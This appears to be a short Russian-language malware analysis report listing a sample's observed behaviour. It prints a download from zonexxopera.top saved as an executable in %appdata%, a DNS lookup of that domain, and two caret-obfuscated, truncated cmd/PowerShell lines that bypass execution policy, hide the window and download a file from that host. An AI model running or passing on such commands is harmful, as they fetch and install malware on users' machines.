Техническая информация
- http://zonexxopera.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "pO^WEr^sH^ELl.^EXe -^E^X^eCu^Tio^n^po^li^c^Y^ b^Y^PAss -nOPro^F^iL^e -WiN^d^ow^Sty^le ^HIdDEN^ ^(new^-^OBJEC^T S^y^S^t^e^m^.Net^.^WE^bC^LiE^nt).do^WnLoAd^F^iL^e('http://zonexxopera.t...
- DNS ASK zo###xopera.top
- '<SYSTEM32>\cmd.exe' /C "pO^WEr^sH^ELl.^EXe -^E^X^eCu^Tio^n^po^li^c^Y^ b^Y^PAss -nOPro^F^iL^e -WiN^d^ow^Sty^le ^HIdDEN^ ^(new^-^OBJEC^T S^y^S^t^e^m^.Net^.^WE^bC^LiE^nt).do^WnLoAd^F^iL^e('http://zonexxopera.t...' (со скрытым окном)